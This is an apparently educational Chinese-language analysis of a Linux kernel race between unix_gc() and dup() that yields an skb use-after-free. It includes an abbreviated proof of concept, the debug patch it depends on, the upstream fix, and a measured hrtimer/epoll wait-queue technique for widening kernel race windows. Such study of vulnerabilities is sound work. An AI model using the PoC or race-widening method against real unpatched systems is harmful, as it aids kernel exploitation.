author: 熊潇 of IceSword Lab
概述 原文: Racing against the clock – hitting a tiny kernel race window
Part.1: 漏洞原理简述
Part.2: 对比较容易产生疑惑的地方增加了细节说明
Part.3: 针对文中提高 race 的技巧做了分析
Part.1 The bug & race
The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.
The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu()
/ get_file_rcu_many()
by __fget_files()
as long as the refcount is non-zero.
unix_gc()
的预期逻辑是: total_refs
和 inflight_refs
相同就可以认为此时 file
是单独占有的,就可以把 skb
和 file
一起 free 掉
下面代码 (3) 在 (1) 和 (2)中间执行则 race 成功
如果 race 没有成功,__fget_files
那里就会发现 f_count
是 0 或者 file 是 NULL
但是如果 race 成功的话,file->f_count
在 __fget_files()
中会被加 1 ,在 unix_gc
后面的代码中就不会被释放 file
的内存,而只是把 f_count
减 1,这也意味着在 close()
之后依然可以 dup()
成功
1 2 3 4 5 6 7 8 9 10 11 12 13 dup() -> __fget_files() file = files_lookup_fd_rcu(files, fd); ... get_file_rcu_many(file, refs) close () -> unix_gc() list_for_each_entry_safe(u, next, &gc_inflight_list, link) { total_refs = file_count(u->sk.sk_socket->file); inflight_refs = atomic_long_read(&u->inflight); ... if (total_refs == inflight_refs) { list_move_tail(&u->link, &gc_candidates); ...
unix_gc() 中 file 和 skb 没有同步释放可能造成的影响?
下面这个方式可以触发 skb UAF:
1 2 3 4 5 6 socketpair() sendmsg(4 , 3 ) -> skb_queue_tail(&other->sk_receive_queue, skb); close (3 ) | dup(3 ) recvmsg(3 ) -> last = skb = skb_peek(&sk->sk_receive_queue);
skb uaf:
allocated in: sendmsg() -> unix_stream_sendmsg()
freed in: close() -> unix_gc()
uafed in: recvmsg() -> unix_stream_read_generic()
Part.2 SCM_RIGHTS unix socket
SCM_RIGHTS
is a socket control message used for passing file descriptors between processes over a UNIX domain socket.
It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write to the same file or device.
example
sender.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 #include <sys/socket.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/un.h> int main (int argc, char *argv[]) { if (argc < 2 ) { printf ("Usage: %s <file_path>\n" , argv[0 ]); return 1 ; } char *file_path = argv[1 ]; int sock = socket(AF_UNIX, SOCK_STREAM, 0 ); if (sock == -1 ) { perror("socket" ); return 1 ; } struct sockaddr_un addr ; memset (&addr, 0 , sizeof (addr)); addr.sun_family = AF_UNIX; strncpy (addr.sun_path, "/tmp/file_transfer.sock" , sizeof (addr.sun_path) - 1 ); if (connect (sock, (struct sockaddr *) &addr, sizeof (addr)) == -1 ) { perror("connect" ); return 1 ; } int fd = open (file_path, O_RDONLY); if (fd == -1 ) { perror("open" ); return 1 ; } struct msghdr msg = {0 }; char buf[CMSG_SPACE(sizeof (fd))]; memset (buf, 0 , sizeof (buf)); struct iovec io = { .iov_base = "hello" , .iov_len = 5 }; msg.msg_iov = &io; msg.msg_iovlen = 1 ; msg.msg_control = buf; msg.msg_controllen = sizeof (buf); struct cmsghdr *cmsg = CMSG_FIRSTHDR (&msg ); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; cmsg->cmsg_len = CMSG_LEN(sizeof (fd)); *((int *) CMSG_DATA(cmsg)) = fd; if (sendmsg(sock, &msg, 0 ) == -1 ) { perror("sendmsg" ); return 1 ; } close (fd); close (sock); return 0 ; }
recver.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 #include <sys/socket.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <sys/un.h> int main (int argc, char *argv[]) { int sock = socket(AF_UNIX, SOCK_STREAM, 0 ); if (sock == -1 ) { perror("socket" ); return 1 ; } struct sockaddr_un addr ; memset (&addr, 0 , sizeof (addr)); addr.sun_family = AF_UNIX; strncpy (addr.sun_path, "/tmp/file_transfer.sock" , sizeof (addr.sun_path) - 1 ); if (bind(sock, (struct sockaddr *) &addr, sizeof (addr)) == -1 ) { perror("bind" ); return 1 ; } if (listen (sock, 1 ) == -1 ) { perror("listen" ); return 1 ; } int client_sock = accept(sock, NULL , NULL ); if (client_sock == -1 ) { perror("accept" ); return 1 ; } char buf[256 ]; struct iovec io = { .iov_base = buf, .iov_len = sizeof (buf) }; struct msghdr msg = { .msg_iov = &io, .msg_iovlen = 1 }; char control[CMSG_SPACE(sizeof (int ))]; msg.msg_control = control; msg.msg_controllen = sizeof (control); if (recvmsg(client_sock, &msg, 0 ) == -1 ) { perror("recvmsg" ); return 1 ; } struct cmsghdr *cmsg = CMSG_FIRSTHDR (&msg ); if (cmsg == NULL || cmsg->cmsg_type != SCM_RIGHTS) { printf ("Invalid message\n" ); return 1 ; } int fd = *((int *) CMSG_DATA(cmsg)); if (fd == -1 ) { perror("No file descriptor received" ); return 1 ; } char buf2[256 ]; ssize_t bytes_read; while ((bytes_read = read (fd, buf2, sizeof (buf2))) > 0 ) { printf ("%s" , buf2); } close (fd); close (client_sock); close (sock); return 0 ; }
Unix socket sendmsg()
and recvmsg()
用于发送和接收 SCM_RIGHTS
unix socket 数据的主要处理函数是: unix_stream_sendmsg
和 unix_stream_read_generic
特殊的地方在于:
sendmsg
的时候会创建 skb
并放在全局列表 gc_inflight_list
和接收端的 sk_receive_queue
上
发送的 fd
对应的 file
会绑定到 skb
上(f_count
也会加 1)
recvmsg
的时候从 sk_receive_queue
取 skb
unix_gc
则从 gc_inflight_list
取 skb
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 sendmsg() -> __sys_sendmsg() -> sock_sendmsg()-> sock_sendmsg_nosec() -> unix_stream_sendmsg() **__scm_send()** scm_fp_copy() fget_raw(fd) ... __fget_files() other = unix_peer(sk); skb = sock_alloc_send_pskb() **unix_scm_to_skb()** unix_attach_fds() unix_inflight() list_add_tail(&u->link, &**gc_inflight_list**); **skb->destructor = unix_destruct_scm;** **** skb_queue_tail(&other->**sk_receive_queue**, skb);
1 2 3 4 5 6 7 8 9 10 11 12 13 recvmsg() -> __sys_recvmsg() -> ... -> unix_stream_recvmsg() unix_stream_read_generic() last = skb = skb_peek(&sk->sk_receive_queue); scm_recv() scm_detach_fds() receive_fd_user() .. fd_install(new_fd, get_file(file)); __scm_destroy() fput() fput_many()
**struct sk_buff *skb
, struct unix_sock *u
, struct socket *sock
, struct sock *sk
和 struct file *file
之间的关系?**
1 2 3 4 5 6 7 8 9 struct socket *sock = &container_of (file ->f_inode , struct socket_alloc , vfs_inode )->socket struct sock *sk = sock ->sk struct unix_sock *u = (struct unix_sock *)sk struct file *file = u ->sk .sk_socket ->file struct file *file = (*(struct unix_skb_parms *)&((skb )->cb )).fp ->fp [i ]
unix_gc()
做了什么?
遍历 gc_inflight_list
获取 unix_sock
对象
把满足条件的 unix_sock
添加到 gc_candidates
条件:unix_sock
的文件引用和 skb
引用值相同
遍历 gc_candidates
释放 hitlist
上的 skb
内存和与之绑定的 struc file
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 unix_gc() struct sk_buff_head hitlist ; ... list_for_each_entry_safe(u, next, &gc_inflight_list, link) { total_refs = file_count(u->sk.sk_socket->file); inflight_refs = atomic_long_read(&u->inflight); if (total_refs == inflight_refs) { list_move_tail(&u->link, &gc_candidates); } ... skb_queue_head_init(&hitlist); list_for_each_entry(u, &gc_candidates, link) scan_children(&u->sk, inc_inflight, &hitlist); scan_inflight(&u->sk, func, hitlist); __skb_queue_tail(hitlist, skb); ... __skb_queue_purge(&hitlist); kfree_skb(skb);
unix_gc() 中 file 和 skb 在哪里 free ?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 unix_gc() ... skb_queue_head_init(&hitlist); list_for_each_entry(u, &gc_candidates, link) scan_children(&u->sk, inc_inflight, NULL ); scan_inflight(&u->sk, func, hitlist); __skb_queue_tail(hitlist, skb); ... __skb_queue_purge(&hitlist); kfree_skb(skb); ... **skb->destructor() unix_destruct_scm()** scm_destroy() __scm_destroy() **fput() kfree_skbmem() **kmem_cache_free(.., skb) sendmsg() __sys_sendmsg() sock_sendmsg() sock_sendmsg_nosec() unix_stream_sendmsg() skb = sock_alloc_send_pskb() unix_scm_to_skb() **skb->destructor = unix_destruct_scm;**
unix_gc()
何时被调用?
close()
可以间接触发
具体入口的 syscall_exit_to_user_mode() - __fput()
sendmsg()
也可以触发但只在队列满的时候
sendmsg() - wait_for_unix_gc()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 close () close_fd() filp_close() fput() fput_many(file, 1 ); atomic_long_sub_and_test(refs, &file->f_count) init_task_work(&file->f_u.fu_rcuhead, ____fput) task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME) entry_SYSCALL_64 do_syscall_64 syscall_exit_to_user_mode ... tracehook_notify_resume task_work_run() __fput() sock_close() __sock_release() unix_release() unix_release_sock() **unix_gc()**
1 2 3 4 5 6 7 sendmsg() ... unix_stream_sendmsg()/unix_dgram_sendmsg() wait_for_unix_gc() if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress) **unix_gc();**
dup() 的作用和实现原理?
根据 fd 从 fd table 中获取 struct file *file
如果 f_count
不为 0 则 file->f_count += 1
fd table 中新建一个条目指向 file
1 2 3 4 5 6 7 8 9 SYSCALL_DEFINE1(dup, unsigned int , fildes) fget_raw() __fget(fd, FMODE_PATH, 1 ) __fget_files(current->files, fd, mask, refs) file = files_lookup_fd_rcu(files, fd); get_file_rcu_many(file, refs) atomic_long_add_unless(&(x)->f_count, (cnt), 0 ) get_unused_fd_flags() fd_install()
close()
的作用和实现原理?
使 fd 重新可用
把 fd table 中 fd 对应的条目删除(设置为 NULL)
fd table 中原来指向的 struct file
的 f_count
减 1,如果减到 0 则释放 struct file 的内存
close
不一定会立马释放 struct file
, 但是用户态不能再访问该 fd
,比如dup(fd)
,read(fd)
..
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 close () close_fd() pick_file() fdt = files_fdtable(files); file = fdt->fd[fd]; **rcu_assign_pointer(fdt->fd[fd], NULL ); __put_unused_fd(files, fd); filp_close() **fput()** fput_many(file, 1 ); atomic_long_sub_and_test(refs, &file->f_count) **init_task_work(&file->f_u.fu_rcuhead, ____fput)** task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME) ____fput() __fput() file_free() file_free_rcu() **kmem_cache_free(filp_cachep, f)
增加 kernel delay patch 的 poc 如何 work ?
line-27 将 pair[0] f_count +1 并添加到 gc_inflight_list
和 sk_receive_queue
line-29 和 line-43 用于触发 unix_gc()
调用, 因为需要一个 f_count
为 1 的 fd
被 close()
line-36 用于等待 resurrect_fn()->dup()->__fget_files()
调用进入 race window 拿到 struct file
, 因为 line-37 会把 pair[0]
从 fd table 中移除。 usleep 的时间 100000 us 要小于 kernel patch 的 500ms
line-43 会在 __fget_files()
等待的期间执行 unix_gc()
, 在执行到准备释放 skb 的代码时,会等待 line-11 的 dup() 完成。
dup()
完成后执行到 line-16 的 recvmsg()
,内核会等待 line-43 触发的 unix_gc()
完成 skb 的释放
unix_gc()
完成后,recvmsg()
继续执行拿到被释放的 skb,UAF
省略版 POC :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 1 void send_fd (int sock, int fd) {2 ...3 sendmsg(sock, &msg, 0 );4 }5 6 int resurrect_fd = -1 ;7 int resurrected_fd = -1 ;8 9 void *resurrect_fn (void *arg) {10 prctl(PR_SET_NAME, "SLOW-ME" ); 11 resurrected_fd = dup(resurrect_fd);12 prctl(PR_SET_NAME, "resurrect" );13 14 prctl(PR_SET_NAME, "SLOW-RECV" );15 ...16 int recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);17 prctl(PR_SET_NAME, "resurrect" );18 19 return NULL ;20 }21 22 int main (void ) {23 24 int pair[2 ];25 socketpair(AF_UNIX, SOCK_STREAM, 0 , pair);26 27 send_fd(pair[1 ], pair[0 ]);28 29 int trigger_sock = socket(AF_UNIX, SOCK_DGRAM, 0 );30 31 resurrect_fd = pair[0 ];32 33 pthread_t resurrect_thread;34 pthread_create(&resurrect_thread, NULL , resurrect_fn, NULL );35 36 usleep(100000 ); 37 close (pair[0 ]);38 39 43 close (trigger_sock);44 45 46 pthread_join(resurrect_thread, NULL );47 48 }
kernel patch 增加三个 mdelay
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 @@ -850 ,6 +852 ,13 @@ static struct file *__fget_files (struct files_struct *files , unsigned int fd , loop : file = files_lookup_fd_rcu(files, fd); if (file) { + if (strcmp (current->comm, "SLOW-ME" ) == 0 ) { + pr_warn("slowing lookup of fd %u to file 0x%lx with %ld refs\n" , + fd, (unsigned long )file, file_count(file)); **+ mdelay(500 );** + pr_warn("slowed lookup of fd %u to file 0x%lx with %ld refs\n" , + fd, (unsigned long )file, file_count(file)); + } ... @@ -2631 ,6 +2633 ,12 @@ static int unix_stream_read_generic (struct unix_stream_read_state *state, last = skb = skb_peek(&sk->sk_receive_queue); last_len = last ? last->len : 0 ; + if (strcmp (current->comm, "SLOW-RECV" ) == 0 ) { + pr_warn("recvmsg: delaying stream receive\n" ); + mdelay(500 ); + pr_warn("recvmsg: delayed stream receive\n" ); + } + ... @@ -210 ,8 +212 ,11 @@ void unix_gc(void ) ... skb_queue_head_init(&hitlist); + if (strcmp (current->comm, "resurrect" ) == 0 ) { + pr_warn("unix: delaying hitlist setup\n" ); + mdelay(500 ); + pr_warn("unix: hitlist setup delay done\n" ); + } list_for_each_entry(u, &gc_candidates, link) scan_children(&u->sk, inc_inflight, &hitlist);
fixed patch 如何 work ?
补丁效果:在 race window 期间,如果 fd 对应的 struct file
已经从 fd table 移除,则回退对 f_count
的操作,如果发现回退后变为 0 则直接释放 struct file
1 2 3 4 5 6 7 8 9 10 11 12 13 14 diff --git a/fs/file.c b/fs/file.c index 8627 dacfc4246..ad4a8bf3cf109 100644 --- a/fs/file.c +++ b/fs/file.c @@ -858 ,6 +858 ,10 @@ loop: file = NULL ; else if (!get_file_rcu_many(file, refs)) goto loop; + else if (files_lookup_fd_raw(files, fd) != file) { + fput_many(file, refs); + goto loop; + } } rcu_read_unlock();
Part.3 如何利用 hrtimer 扩大 race 成功率?
timerfd_create
+ timerfd_settime
可以在指定时间(纳秒)后触发 timer interrupt
timer interrupt handler 会调用 __wake_up_common
遍历 wait queue 并执行回调函数。这意味着 wait queue 越长,处在 interrupt context 的时间越长
利用这一点可以让进程在 race window 中被中断,然后在另一个 CPU 上运行需要与之 race 的进程
wait queue item 在哪里添加和读取 ?
每一个 EPOLL_CTL_ADD
会在 timer_fd 的 wait queue 上添加一个执行 ep_poll_callback
的 entry
在 timerfd_triggered
中 从 timer_fd 的 wait queue 中取出 entry
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 do_epoll_ctl() ep_insert(struct eventpoll *ep, .. struct ep_pqueue epq; init_poll_funcptr(&epq.pt, **ep_ptable_queue_proc**); ep_item_poll(epi, &epq.pt, 1 ); vfs_poll timerfd_poll struct timerfd_ctx *ctx = file->private_data; poll_wait(file, &ctx->wqh, wait); **ep_ptable_queue_proc**(struct file *file, wait_queue_head_t *whead, poll_table *pt) struct epitem *epi = ep_item_from_epqueue(pt); struct eppoll_entry *pwq; ... pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL); ... **init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);** ... **add_wait_queue(whead, &pwq->wait); ... struct ep_pqueue { poll_table pt; struct epitem *epi; } struct poll_table_struct { poll_queue_proc _qproc; __poll_t _key; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 local_apic_timer_interrupt() **hrtimer_interrupt()** ... timerfd_tmrproc() **timerfd_triggered()** **spin_lock_irqsave(&ctx->wqh.lock, flags);** **** ctx->expired = 1 ; ctx->ticks++; wake_up_locked_poll(**&ctx->wqh**, EPOLLIN); **__wake_up_common() wait_queue_entry_t *curr, *next; **list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)** ret = curr->func(curr, mode, wake_flags, key); spin_unlock_irqrestore(&ctx->wqh.lock, flags);
**timerfd_tmrproc
在 timerfd_setup
中设置**
1 2 3 4 5 6 static int timerfd_setup (struct timerfd_ctx *ctx, int flags, const struct itimerspec64 *ktmr) .. hrtimer_init(&ctx->t.tmr, clockid, htmode); hrtimer_set_expires(&ctx->t.tmr, texp); ctx->t.tmr.function = timerfd_tmrproc;
**struct timerfd_ctx
, struct file
, struct hrtimer
之间的关系**
1 2 3 4 5 struct timerfd_ctx *ctx = file ->private_data ;struct hrtimer *htmr = &ctx ->t .tmr ;struct timerfd_ctx *ctx = container_of (htmr , struct timerfd_ctx , t .tmr );
测试代码:
向 wait queue 中添加 500 * 500 个 entry
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 #define _GNU_SOURCE #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/epoll.h> #include <sys/timerfd.h> #include <sched.h> #include <err.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1 ) \ err(1 , "SYSCHK(" #x ")" ); \ __res; \ }) #define NUM_EPOLL_INSTANCES 500 #define NUM_DUP_FDS 500 #define NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS) #define NSEC_PER_SEC 1000000000UL void pin_task_to (int pid, int cpu) { cpu_set_t cset; CPU_ZERO(&cset); CPU_SET(cpu, &cset); SYSCHK(sched_setaffinity(pid, sizeof (cpu_set_t ), &cset)); } void pin_to (int cpu) { pin_task_to(0 , cpu); }struct timespec get_mono_time (void ) { struct timespec ts ; clock_gettime(CLOCK_MONOTONIC, &ts); return ts; } void ts_add (struct timespec *ts, unsigned long nsecs) { ts->tv_nsec += nsecs; if (ts->tv_nsec >= NSEC_PER_SEC) { ts->tv_sec++; ts->tv_nsec -= NSEC_PER_SEC; } } int main () { pin_to(0 ); int timerfd = timerfd_create(CLOCK_MONOTONIC, 0 ); if (timerfd < 0 ) { perror("timerfd_create" ); return 1 ; } int epoll_fds[NUM_EPOLL_INSTANCES]; for (int i = 0 ; i < NUM_EPOLL_INSTANCES; i++) { epoll_fds[i] = epoll_create1(0 ); if (epoll_fds[i] < 0 ) { perror("epoll_create1" ); return 1 ; } } int timer_fds[NUM_DUP_FDS]; for (int i = 0 ; i < NUM_DUP_FDS; i++) { timer_fds[i] = dup(timerfd); if (timer_fds[i] < 0 ) { perror("dup" ); return 1 ; } } struct epoll_event ev = { 0 }; ev.events = EPOLLIN; for (int i = 0 ; i < NUM_EPOLL_INSTANCES; i++) { for (int j = 0 ; j < NUM_DUP_FDS; j++) { ev.data.fd = timer_fds[j]; if (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev) < 0 ) { perror("epoll_ctl" ); return 1 ; } } } struct timespec base_time = get_mono_time (); struct itimerspec timer_value = { .it_value = base_time }; ts_add(&timer_value.it_value, 1000 * 1000 * 1000 ); if (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, NULL ) < 0 ) { perror("timerfd_settime" ); return 1 ; } for (int i = 0 ; i < NUM_EPOLL_INSTANCES; i++) { int nfds = epoll_wait(epoll_fds[i], &ev, 1 , -1 ); if (nfds < 0 ) { perror("epoll_wait" ); return 1 ; } } unsigned long value; read (timerfd, &value, sizeof (value)) == sizeof (value); printf ("value: %ld\n" , value); for (int i = 0 ; i < NUM_EPOLL_INSTANCES; i++) { close (epoll_fds[i]); } for (int i = 0 ; i < NUM_DUP_FDS; i++) { close (timer_fds[i]); } close (timerfd); return 0 ; }
如何观测延迟效果?
在 GDB 中可以查看队列中的 entry,数量与设置的一致
1 2 3 4 5 6 7 8 b timerfd_triggered set $head = &ctx.wqh.headset $node = $headwhile $node.next != $headp $node.next set $node = $node.nextend p *$head
加一点 patch 用 rdtsc
可以粗略测量一下延迟效果
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 **0xffffffff81b8b67e <+49 >: rdtsc** 0xffffffff81b8b680 <+51 >: shl rdx,0x20 0xffffffff81b8b684 <+55 >: or rax,rdx0xffffffff81b8b687 <+58 >: lea r12,[rbx+0x88 ]0xffffffff81b8b68e <+65 >: mov r14,rax0xffffffff81b8b691 <+68 >: mov rdi,r120xffffffff81b8b694 <+71 >: call 0xffffffff81bde9d0 <_raw_spin_lock_irqsave>0xffffffff81b8b699 <+76 >: inc QWORD PTR [rbx+0xa0 ]0xffffffff81b8b6a0 <+83 >: mov edx,0x1 0xffffffff81b8b6a5 <+88 >: mov rdi,r120xffffffff81b8b6a8 <+91 >: mov WORD PTR [rbx+0xac ],0x1 0xffffffff81b8b6b1 <+100 >: mov r13,rax0xffffffff81b8b6b4 <+103 >: mov esi,0x3 0xffffffff81b8b6b9 <+108 >: call 0xffffffff810ad650 <__wake_up_locked_key>0xffffffff81b8b6be <+113 >: mov rsi,r130xffffffff81b8b6c1 <+116 >: mov rdi,r120xffffffff81b8b6c4 <+119 >: call 0xffffffff81bde5b0 <_raw_spin_unlock_irqrestore>**0xffffffff81b8b6c9 <+124 >: rdtsc**
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 diff --git a/fs/timerfd.c b/fs/timerfd.c index e9c96a0c79f1..b919b24b4d48 100644 --- a/fs/timerfd.c +++ b/fs/timerfd.c @@ -64 ,11 +64 ,20 @@ static void timerfd_triggered (struct timerfd_ctx *ctx) { unsigned long flags; + u64 start_time, end_time; + + pr_warn("[%s] %s enter\n" , current->comm, __func__); + + asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0" + : "=a" (start_time) :: "%rdx" ) ; spin_lock_irqsave(&ctx->wqh.lock, flags); ctx->expired = 1 ; ctx->ticks++; wake_up_locked_poll(&ctx->wqh, EPOLLIN); spin_unlock_irqrestore(&ctx->wqh.lock, flags); + asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0" + : "=a" (end_time) :: "%rdx" ) ;+ pr_warn("[%s] %s exit, %lld\n" , current->comm, __func__, end_time - start_time); }
系统正常运行的时候 tick 数大概在 3000 ~ 30000, 创建 500 * 500 个 entry 可以使cpu 运行时间增大 3~4 个数量级(测试虚拟机的CPU是单核 2000 MHz)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [ 1134.053250 ] [swapper/0 ] timerfd_triggered exit , 2976 [ 1134.053250 ] [swapper/0 ] timerfd_triggered enter [ 1134.053250 ] [swapper/0 ] timerfd_triggered exit , 3970 [ 1134.552271 ] [swapper/0 ] timerfd_triggered enter [ 1134.552906 ] [swapper/0 ] timerfd_triggered exit , 11616 [ 1175.552958 ] [swapper/0 ] timerfd_triggered enter [ 1175.553871 ] [swapper/0 ] timerfd_triggered exit , 32663 [ 1176.052796 ] [swapper/0 ] timerfd_triggered enter [ 1176.053719 ] [swapper/0 ] timerfd_triggered exit , 29340 [ 1184.738834 ] [swapper/0 ] timerfd_triggered enter **[ 1184.739757 ] [swapper/0 ] timerfd_triggered exit , 27116541 ...** [ 1588.076916 ] [swapper/0 ] timerfd_triggered enter **[ 1588.077841 ] [swapper/0 ] timerfd_triggered exit , 28924883 ...** [ 1596.735608 ] [swapper/0 ] timerfd_triggered enter **[ 1596.736503 ] [swapper/0 ] timerfd_triggered exit , 28029898 .. [ 1222.384483 ] [swapper/0 ] timerfd_triggered enter **[ 1222.385381 ] [swapper/0 ] timerfd_triggered exit , 8511668 ... [ 1265.026284 ] [swapper/0 ] timerfd_triggered enter **[ 1265.027208 ] [swapper/0 ] timerfd_triggered exit , 1202548
一种观测代码被中断位置的方法 原文的附录:
I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register
代码实现:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <string.h> #include <ucontext.h> #include <sys/time.h> #include <sys/user.h> #include <time.h> #include <sched.h> #include <err.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1 ) \ err(1 , "SYSCHK(" #x ")" ); \ __res; \ }) void pin_task_to (int pid, int cpu) { cpu_set_t cset; CPU_ZERO(&cset); CPU_SET(cpu, &cset); SYSCHK(sched_setaffinity(pid, sizeof (cpu_set_t ), &cset)); } void pin_to (int cpu) { pin_task_to(0 , cpu); }void timer_handler (int signum, siginfo_t *info, void *context) { ucontext_t *ucontext = (ucontext_t *) context; void *pc = (void *) ucontext->uc_mcontext.gregs[REG_RIP]; long rax = ucontext->uc_mcontext.gregs[REG_RAX]; printf ("Timer fired, PC = %p, rax: %ld\n" , pc, rax); } int main () { pin_to(0 ); struct sigaction sa ; memset (&sa, 0 , sizeof (sa)); sa.sa_flags = SA_SIGINFO; sa.sa_sigaction = timer_handler; sigaction(SIGALRM, &sa, NULL ); struct itimerspec its ; its.it_interval.tv_sec = 0 ; its.it_interval.tv_nsec = 10000000 ; its.it_value = its.it_interval; timer_t timerid; timer_create(CLOCK_MONOTONIC, NULL , &timerid); timer_settime(timerid, 0 , &its, NULL ); volatile int i; while (1 ) { __asm__ volatile ( "mov $1, %%rax\n\t" "mov $2, %%rax\n\t" "mov $3, %%rax\n\t" "mov $4, %%rax\n\t" "mov $5, %%rax\n\t" "mov $6, %%rax\n\t" "mov $7, %%rax\n\t" "mov $8, %%rax\n\t" "mov $9, %%rax\n\t" "mov $10, %%rax\n\t" : : : "%rax" ) ; } return 0 ; }